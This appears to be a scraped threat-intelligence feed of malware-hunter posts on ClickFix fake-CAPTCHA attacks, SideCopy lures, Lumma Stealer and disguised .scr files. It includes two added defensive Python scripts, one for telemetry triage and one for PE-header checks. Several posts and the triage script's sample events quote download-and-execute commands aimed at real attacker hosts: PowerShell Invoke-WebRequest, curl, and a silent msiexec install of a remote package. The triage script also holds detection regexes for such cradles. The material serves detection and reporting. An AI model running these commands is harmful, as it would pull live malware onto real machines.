JAMESWT
@JAMESWT_WT
#Independent #Malware #Hunter #CyberSecurity #InfoSec https://www.virustotal.com/gui/user/jameswt
#booking #clickfix #fakecaptcha visitor31740[.]help 👇 powershell -c "Invoke-WebRequest -Uri '95.164.55[.]176:5554/kalik.bat' 👇 curl 95.164.55[.]176:5554 👇 kalik.bat 👇 JPERGDUP.msi STZIAZID.msi Samples: bazaar.abuse.ch/browse/tag/95-… AnyRun: app.any.run/tasks/65aa50fa… cc @500mk500 @k3dg3
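The chain above (fake-CAPTCHA page, pasted PowerShell Invoke-WebRequest cradle, a .bat that curls the same IP:port, two MSI payloads) is what a detection engineer would want to catch in process-creation telemetry. The script below is an added example, not code from the tweet or its author. It assumes Sysmon Event ID 1 style records (Image, ParentImage, CommandLine) and scores the ClickFix pattern: a scripting or download host spawned from explorer.exe (Win+R) or a browser, with a download primitive, a raw IP or URL, and a dropped script/installer name. The sample events are constructed to mirror the tweet's chain and are not captured logs.

```python
"""Triage ClickFix-style process-creation telemetry.

Added example, not code from the tweet or its author. It assumes process-
creation records shaped like Sysmon Event ID 1 (Image, ParentImage,
CommandLine); the sample events below are constructed to mirror the chain in
the tweet (explorer-spawned powershell Invoke-WebRequest -> .bat -> curl -> .msi)
and are not captured telemetry.
"""
import re
from dataclasses import dataclass, field

# Download/execution primitives commonly pasted into Win+R by fake-CAPTCHA pages.
CRADLE_RE = re.compile(
    r"(?:invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|downloadfile|"
    r"start-bitstransfer|\bmshta\b|msiexec(?:\.exe)?\s+/q)",
    re.IGNORECASE,
)
# Full URLs, or bare IPv4 with optional port and path (the tweet's C2 is a raw IP:port).
IOC_RE = re.compile(
    r"(?:https?://[^\s'\"]+|(?:\d{1,3}\.){3}\d{1,3}(?::\d{2,5})?(?:/[^\s'\"]*)?)",
    re.IGNORECASE,
)
# Dropped-file names by extension; .scr/.pif are PE executables despite the name.
PAYLOAD_RE = re.compile(r"[\w-]+\.(?:bat|cmd|msi|ps1|hta|vbs|js|exe|scr|pif|zip)\b", re.IGNORECASE)

LAUNCHERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe", "msiexec.exe"}
# Win+R leaves explorer.exe as the parent; a browser parent covers the in-page variant.
SUSPICIOUS_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}


@dataclass
class Finding:
    image: str
    parent: str
    score: int
    iocs: list = field(default_factory=list)
    payloads: list = field(default_factory=list)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def defang(ioc):
    """Defang for reporting so the indicator cannot be clicked by accident."""
    return ioc.replace("http", "hxxp").replace(".", "[.]")


def score_event(event):
    """Score one record; None when the image is not a scripting/download host."""
    image = basename(event.get("Image", ""))
    if image not in LAUNCHERS:
        return None
    cmd = event.get("CommandLine", "")
    parent = basename(event.get("ParentImage", ""))
    iocs = [defang(m) for m in dict.fromkeys(IOC_RE.findall(cmd))]
    payloads = list(dict.fromkeys(PAYLOAD_RE.findall(cmd)))
    score = 0
    if CRADLE_RE.search(cmd):
        score += 2          # download/execute primitive present
    if iocs:
        score += 1          # talks to a URL or raw IP
    if parent in SUSPICIOUS_PARENTS:
        score += 2          # launched from Win+R or a browser, not a scheduler/admin tool
    if payloads:
        score += 2          # drops or runs a script/installer
    return Finding(image, parent, score, iocs, payloads)


def triage_events(events, threshold=4):
    """Return the findings that reach the threshold, in input order."""
    findings = []
    for event in events:
        finding = score_event(event)
        if finding is not None and finding.score >= threshold:
            findings.append(finding)
    return findings


# Constructed sample telemetry (not real logs): the first two mirror the tweet's chain,
# the last two are benign admin/developer activity that should not fire.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -c \"Invoke-WebRequest -Uri '95.164.55.176:5554/kalik.bat' -OutFile kalik.bat\""},
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl 95.164.55.176:5554/JPERGDUP.msi -o JPERGDUP.msi"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Microsoft\WindowsApps\WindowsTerminal.exe",
     "CommandLine": "curl https://example.com/api"},
]

if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"{f.score} {f.parent} -> {f.image} iocs={f.iocs} payloads={f.payloads}")
```

The parent-process weight is what separates the Win+R paste from a scheduled PowerShell job; the second-stage curl fires on the cradle plus the .msi name alone, so the two events can be joined on the shared IP:port for a single alert. The score weights and threshold are assumptions to tune against your own telemetry.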
#BREAKING #ESETresearch can confirm the news of #Lumma Stealer's revival. ESET telemetry and botnet tracking show that operators are rebuilding their infrastructure, with their renewed activity reaching similar levels to those before the #disruption in May 2025. 1/6
#Broadcom patches critical #VMware flaws exploited at #Pwn2Own #Berlin 2025 securityaffairs.com/180062/securit… #securityaffairs #hacking
🚨 SCOTUS Backs Texas Porn ID Law In “Free Speech Coalition v. Paxton”, the Court upheld Texas’s law forcing porn sites to verify users' ages via gov’t ID, turning them into surveillance hubs. Proof of age now means loss of #privacy. A starting point: securityboulevard.com/2025/07/prove-……
Read more in the #ESETThreatReport: 🔗 welivesecurity.com/en/eset-resear… 7/7
#ClickFix went from virtually non-existent to the second most common attack vector blocked by #ESET, surpassed only by #phishing. This novel social engineering technique accounted for nearly 8% of all detections in H1 2025. #ESETresearch 1/7
CERT-AgID and the great bazaar of #malware computersecuritynews.it/cert-agid-e-il…
Summary of malicious campaigns in the week of 12 – 18 July 2025 💣 #IoC 875 🦠 #Malware 18 (families) 🐟 #Phishing 14 (brands) ℹ️ Further details 👇 🔗 cert-agid.gov.it/news/sintesi-r…
#SideCopy #APT #Phishing Tour Programme Ayodhya.pdf.lnk c59efe3739ae3e2814ff48f41b0d0ad8 ompowerterminus[.]com SVNUpdates #MSI 4cc0cc070ec8a51b437ddc393487bb7e DUI70.dll #CurlBackRAT f4a82380cc0e246a4f576bc81fa6f879 #C2 backup[.]intelupates[.]com #APT36 #TransparentTribe
#SideCopy #APT #CurlBackRAT Blackout-Rehearsal-Plan.pdf.lnk 68c7c14b9ac69491b23b3c3ad88f3a1e BlackoutRehearsalPlan.msi #MSI b6ef8bb7e47ddc55131990e21d2519a7 msiexec.exe /q /i hxxps://gchindia.com/lib/pdf/Blackout-Rehearsal-Plan/wins/ DUI70.dll 6af1776a02536f72f810ca0fa21f38ff
⚠️ fake Telegram Apps target Android users 607 domains mimic #Telegram to spread #malware via blog-style sites & QR codes. Laced APKs exploit Janus vuln (CVE-2017-13156), enabling remote control. Hosted in China, this campaign abuses old flaws with modern phishing. Read more on…
Another #DarkWatchMan campaign began on 15th June, with multiple waves over the following two days 🔥 DarkWatchMan is still written to disk by a .NET dropper. It also uses the same C2 and DGA as the 29th April campaign (the array contains the same initial strings for domains,…
Pro tip: If you receive a screen saver named "Coinbase_incident_report.scr"* you shouldn't run it. *file format SCR is identical to EXE -- Disguised as PDF Code-signed by "GeoTech-IT Oy". h/t @g0njxa also uploaded to MB by @JAMESWT_WT ❤️ 🔗🧵
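Because a .scr is a PE image like any .exe, the reliable check is the file header, not the extension or the icon. The script below is an added example, not code from the tweet or its author: it reads the DOS stub, follows e_lfanew to the PE signature, pulls the machine, DLL flag and subsystem, and reports whether the extension is one Windows will execute or a document extension hiding a PE. The sample blob is a constructed minimal PE32+ header, not the Coinbase_incident_report.scr sample.

```python
"""Identify a PE executable by its headers, whatever the file is called.

Added example, not from the tweet or its author. A .scr "screen saver" is a
PE image exactly like an .exe, so an extension allowlist or a document icon
proves nothing; the DOS/COFF headers do. The sample blob below is a constructed
minimal PE32+ header, not the Coinbase_incident_report.scr sample.
"""
import struct

MACHINES = {0x014C: "I386", 0x8664: "AMD64", 0xAA64: "ARM64"}
SUBSYSTEMS = {1: "NATIVE", 2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}
IMAGE_FILE_DLL = 0x2000
# Extensions Windows treats as directly executable, .scr and .pif included.
EXEC_EXTS = {"exe", "scr", "pif", "com", "dll", "cpl", "sys"}
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}


def inspect_pe(data, name):
    """Return header facts plus a verdict: not-pe, executable, or disguised."""
    parts = name.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    info = {
        "name": name, "extension": ext, "is_pe": False,
        # invoice.pdf.scr: a document extension placed in front of the real one
        "double_extension": len(parts) > 2 and parts[-2] in DOC_EXTS,
    }
    if len(data) < 0x40 or data[:2] != b"MZ":
        info["verdict"] = "not-pe"
        return info
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        info["verdict"] = "not-pe"
        return info
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    info.update(is_pe=True, machine=MACHINES.get(machine, hex(machine)),
                is_dll=bool(chars & IMAGE_FILE_DLL))
    opt = e_lfanew + 24
    if opt_size >= 70 and opt + 70 <= len(data):
        magic = struct.unpack_from("<H", data, opt)[0]           # 0x10B PE32, 0x20B PE32+
        sub_off = opt + (68 if magic == 0x20B else 64)           # ImageBase is 8 bytes in PE32+
        info["subsystem"] = SUBSYSTEMS.get(struct.unpack_from("<H", data, sub_off)[0], "OTHER")
    info["verdict"] = "executable" if ext in EXEC_EXTS else "disguised"
    return info


def build_sample_pe():
    """Constructed minimal PE32+ header (no sections, no code); for the demo only."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew right after the DOS header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x0022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                        # PE32+
    struct.pack_into("<H", opt, 68, 2)                           # Subsystem = WINDOWS_GUI
    return bytes(dos) + coff + bytes(opt)


def inspect_file(path):
    """Inspect a file on disk; the whole file is read so a large e_lfanew still resolves."""
    with open(path, "rb") as fh:
        return inspect_pe(fh.read(), path.replace("\\", "/").rsplit("/", 1)[-1])


if __name__ == "__main__":
    blob = build_sample_pe()
    for name in ("Coinbase_incident_report.scr", "report.pdf", "invoice.pdf.scr"):
        print(inspect_pe(blob, name))
    print(inspect_pe(b"%PDF-1.7\n", "report.pdf"))
```

A WINDOWS_GUI subsystem on a file that claims to be a report is the usual tell for these lures; the code signature mentioned in the tweet is a separate check (Authenticode) that this header parse does not perform.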
I haven't seen macro in a long time #Formbook app.any.run/tasks/b284e691…
🚨 A single DDoS attack just peaked at 7.3 Tbps—in 45 seconds. Cloudflare says hyper-volumetric attacks are exploding, with ransom threats up 68%. Botnets like DemonBot are turning unsecured IoT into weapons. Here’s what’s happening → thehackernews.com/2025/07/hyper-…